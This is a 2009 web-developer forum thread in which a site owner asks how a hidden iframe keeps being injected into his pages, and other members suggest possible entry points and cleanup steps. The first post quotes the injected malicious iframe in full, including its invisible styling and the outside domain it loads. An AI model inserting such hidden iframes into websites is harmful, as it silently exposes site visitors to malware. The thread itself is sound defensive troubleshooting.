SitePoint Sponsor

User Tag List

Results 1 to 15 of 15
  1. #1
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Exclamation Help: Hacker Attack

    Hi There

    There is a mysterious piece of code being added to my websites (header, footer, both).
    The code looks like

    HTML Code:
    <iframe width="480" height="60" style="border: 0px none ; position: relative; top: 0px; left: -500px; opacity: 0;" src="http://profitooltip.biz/blog/feed.html"/>
    Can anyone tell me how could this happen as I have searched all my php files and nothing of the sort is there.

    Please help ASAP

    Kind Regards,
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  2. #2
    Twitter: @AnthonySterling silver trophy AnthonySterling's Avatar
    Join Date
    Apr 2008
    Location
    North-East, UK.
    Posts
    6,111
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    Have you tried disabling JS in your browser to see if the element is still created? Do you display user input on your site. if so, does any of it contain JS or links to JS?

    There's not much anyone can do without seeing your code... or at least a link to the site in question.
    @AnthonySterling: I'm a PHP developer, a consultant for oopnorth.com and the organiser of @phpne, a PHP User Group covering the North-East of England.

  3. #3
    Follow Me On Twitter: @djg gold trophysilver trophybronze trophy Dan Grossman's Avatar
    Join Date
    Aug 2000
    Location
    Philadephia, PA
    Posts
    20,580
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    Do you run any scripts on this site which you did not author yourself? Are they not the very latest versions of those scripts? If you answered yes to those questions, that's a likely entry point.

    The other is through the whole server being compromised through someone else's account or vulnerable software.

    Contact the web host.

  4. #4
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hi i have disabled my javascript and the sites are working perfectly.
    Nothing is being added
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  5. #5
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    @Silver

    Send you my url in PM.
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  6. #6
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Actually the sites are on two separate servers. One in UK and other server in Germany.
    Also, I have no 3rd party software on my pages except Google Analytics and I have just updated my code but still the problem persists.
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  7. #7
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ok its something called an IFrame attack.
    I cant understand the entry point.
    Can you please point at how this could have happened.
    Malicious code adds itself to page's footer/header.
    But surely i havent given out my FTP details to anyone.
    I also add mysql_real_escape_string to all my database insertions.
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  8. #8
    Twitter: @AnthonySterling silver trophy AnthonySterling's Avatar
    Join Date
    Apr 2008
    Location
    North-East, UK.
    Posts
    6,111
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by khuramyz View Post
    @Silver

    Send you my url in PM.
    I have no PM.
    @AnthonySterling: I'm a PHP developer, a consultant for oopnorth.com and the organiser of @phpne, a PHP User Group covering the North-East of England.

  9. #9
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hi Silver

    I think i sent it to you in something else.
    Well it seems like iframe attack and may have stemmed from xss.
    I am checking everything on my own.
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  10. #10
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If you have anything about how iframe attacks generate and how I can prevent them from my site then please share.
    Thanks
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  11. #11
    SitePoint Wizard lorenw's Avatar
    Join Date
    Feb 2005
    Location
    was rainy Oregon now sunny Florida
    Posts
    1,102
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    google for
    another-type-of-iframe-hack-php-exploit

    Thats it.
    What I lack in acuracy I make up for in misteaks

  12. #12
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ummm searching. Anyone with personal experience here ?
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  13. #13
    SitePoint Wizard bronze trophy
    Join Date
    Jul 2008
    Posts
    5,757
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Basically you allowed the hacker to write to your filesystem. Most likely, you have a script somewhere which does something with the filesystem carelessly.

    Sitepoint has a web security forum. You should read through some existing threads to get ideas on where and how to look for the hole.

    Be aware, the hole could very well be another website hosted on the same shared webserver.

  14. #14
    SitePoint Addict khuramyz's Avatar
    Join Date
    Oct 2005
    Location
    Manchester, UK
    Posts
    296
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I got a Plesk server with every site having its own ftp. Sites dont mingle. But its still on the site.
    I asked for apache error logs but nothing there.
    I dont know what to do.
    Last edited by khuramyz; May 8, 2009 at 06:23. Reason: added extra two lines
    Khuram Javaid
    PHP Developer and Entrepreneur
    http://www.phprad.com/

  15. #15
    SitePoint Enthusiast
    Join Date
    Jul 2008
    Posts
    32
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    There could be a variety of reasons.

    Remove that line of code, change your FTP password, see if it still persists.

    Change the CHMOD of the file in question and see if it still persists.

    Search for Javascript that might have document.createElement("iframe") or document.write("iframe code here") and find out how that code got there.

    etc...


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •